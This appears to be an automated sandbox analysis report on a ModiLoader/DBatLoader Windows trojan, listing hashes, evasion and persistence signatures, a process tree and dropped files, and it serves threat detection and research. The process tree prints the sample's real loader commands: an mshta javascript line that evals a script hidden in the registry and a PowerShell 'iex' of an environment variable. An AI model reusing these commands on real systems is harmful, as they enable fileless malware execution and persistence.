Overview

overview

10

Static

static

3

5b27f5d52a...18.exe

windows7-x64

10

5b27f5d52a...18.exe

windows10-2004-x64

1

Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    19-05-2024 19:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    5b27f5d52a806e359b3a651803074266_JaffaCakes118.exe

  • Size

    320KB

  • MD5

    5b27f5d52a806e359b3a651803074266

  • SHA1

    915ae0bd1d5681cd5880d3b6eb1a5392b4b465ec

  • SHA256

    6a63c53d68d24accf35f17a53de6fb926f5fd027982afd53e8477860533abc60

  • SHA512

    b771c6e1cc96c1091204a10119bde7f28a885918a61efd211e32394909bb477d6e6d33b925baf8e78d5dc16c44260b2ad47d8e4002c64710e8d922b17b5a7468

  • SSDEEP

    6144:qWkHk7Gknm0qSDlhHFj6SWC1e3jKb9wWF/QYD5A:8E77m0DhpFOSWlWnFrDe

Score
10/10
modiloaderevasionpersistencetrojan

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

    trojanmodiloader
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

    evasion
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
    evasion
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
    evasion
  • ModiLoader Second Stage 52 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5b27f5d52a806e359b3a651803074266_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\5b27f5d52a806e359b3a651803074266_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2692
    • C:\Users\Admin\AppData\Local\Temp\5b27f5d52a806e359b3a651803074266_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\5b27f5d52a806e359b3a651803074266_JaffaCakes118.exe
      2⤵
        PID:3016
    • C:\Windows\system32\mshta.exe
      "C:\Windows\system32\mshta.exe" javascript:Ude92qKG="w52";G68L=new%20ActiveXObject("WScript.Shell");UUPm72BTb="FvV";hig1r=G68L.RegRead("HKLM\\software\\Wow6432Node\\qeNKDMR\\3mDMNj1S");zmt4Y2="pfJ5O1v";eval(hig1r);jJI0fy="hpE5fk";
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:sdawyw
        2⤵
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2636
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe
          3⤵
          • Looks for VirtualBox Guest Additions in registry
          • Looks for VirtualBox drivers on disk
          • Looks for VMWare Tools registry key
          • Checks BIOS information in registry
          • Deletes itself
          • Drops startup file
          • Adds Run key to start application
          • Maps connected drives based on registry
          • Suspicious use of SetThreadContext
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\SysWOW64\regsvr32.exe
            "C:\Windows\SysWOW64\regsvr32.exe"
            4⤵
              PID:308

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\d71742\043bcc.c56af49
        Filesize

        47KB

        MD5

        ddf52280b3b534a9e9f82c1edca70a76

        SHA1

        707c552c0c5dd9ea2455fb335001ff358fd4d182

        SHA256

        73bee007771b91f82692c4d381ff8e70c153c3839782a13c3a4098333ed0ed2b

        SHA512

        72a3ebcb557e290f59c776b5694eb47bd0c889130a9148d72772de7178c14a81c551d1883677aacc8555041969fb20d5f92f2c40f69c474b7485e7a43200f9b9

        Download Submit
      • C:\Users\Admin\AppData\Local\d71742\cc24ba.lnk
        Filesize

        877B

        MD5

        6fb53ea3658b9fc5dac4d0f46d8f5d30

        SHA1

        e8fbb893203498921a709c820d3a5a8fd303ef95

        SHA256

        44ed6ab3ec7f3226dcf8f4e64a09f3700681ea0c109e2dc46ac24800ad46da4c

        SHA512

        727ccf52e441093743335c0d764d651f120116590019a80c191f895a4870ecf3497a553aa8ce30ffe001ddf6d361778f3a18af52b29271d6402ef2ccdcef7e70

        Download Submit
      • C:\Users\Admin\AppData\Local\d71742\ee03f2.bat
        Filesize

        61B

        MD5

        251c82732dbd03982f565deed73bb4f2

        SHA1

        2f903f60f1946953494fb995438cc2419abe59df

        SHA256

        4b67bfb9575e3dffcba2ad2d0c3b194119b1671d0e079ca9a2ff85b177d438f2

        SHA512

        1c6d1dd21ef660f870e23663b8f895f2255bf43830e93690217124a6b4a8cc563f97a4db145dd247b93bda3d49b7ef9d2ddf4ce58c72eccfb4609a356afd1344

        Download Submit
      • C:\Users\Admin\AppData\Roaming\3aef84\6d4792.c56af49
        Filesize

        8KB

        MD5

        3b8d23cad0842593dd25dcccc3fbdaeb

        SHA1

        fb67087da1220fe68268db9a6f1658c9d4a65dfb

        SHA256

        a1670df066b49db374a450663c04c7c7add8b57010aca3e754409c88d710e65e

        SHA512

        4118279f0bb839a9d3c92caa21c26a28a78cd8ee93f9532296f372d4f1c95d20d890e21ac248e50d3a73d4acb92b0fdb4f403cb3bce5421a0196d1a09894846e

        Download Submit
      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\162913.lnk
        Filesize

        987B

        MD5

        38779e4f33ea0f095cd6952895d85847

        SHA1

        40267520e7beac250abce7324496acdbd2851a89

        SHA256

        04d4548e83b8f4b253b23eaadc0b670c64cbcd6c3d09de730b974f9e113f34e1

        SHA512

        13461e1fe97052904809edcd938a074ec49806208c5670b09820e4a2f8487f2d0c221a5cb825aae3bbfb7e16831da8104741e264439706c379c2d4573cb251b4

        Download Submit
      • memory/308-84-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/308-80-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/308-81-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/308-82-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/308-83-0x0000000000110000-0x0000000000251000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-74-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-46-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-62-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-64-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-65-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-32-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-31-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-42-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-66-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-40-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-39-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-38-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-37-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-36-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-35-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-56-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-55-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-54-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-53-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-52-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-51-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-50-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-49-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-48-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-47-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-67-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-45-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-44-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-43-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-41-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-57-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/1628-72-0x0000000000220000-0x0000000000361000-memory.dmp
        Filesize

        1.3MB

        Download
      • memory/2636-30-0x0000000005D10000-0x0000000005DE6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/2636-33-0x00000000026E0000-0x00000000046E0000-memory.dmp
        Filesize

        32.0MB

        Download
      • memory/2636-34-0x0000000005D10000-0x0000000005DE6000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-16-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-2-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-19-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-17-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-15-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-0-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-14-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-20-0x0000000001D80000-0x0000000001E56000-memory.dmp
        Filesize

        856KB

        Download
      • memory/3016-4-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-6-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-8-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-10-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-13-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download
      • memory/3016-12-0x0000000000400000-0x000000000043A000-memory.dmp
        Filesize

        232KB

        Download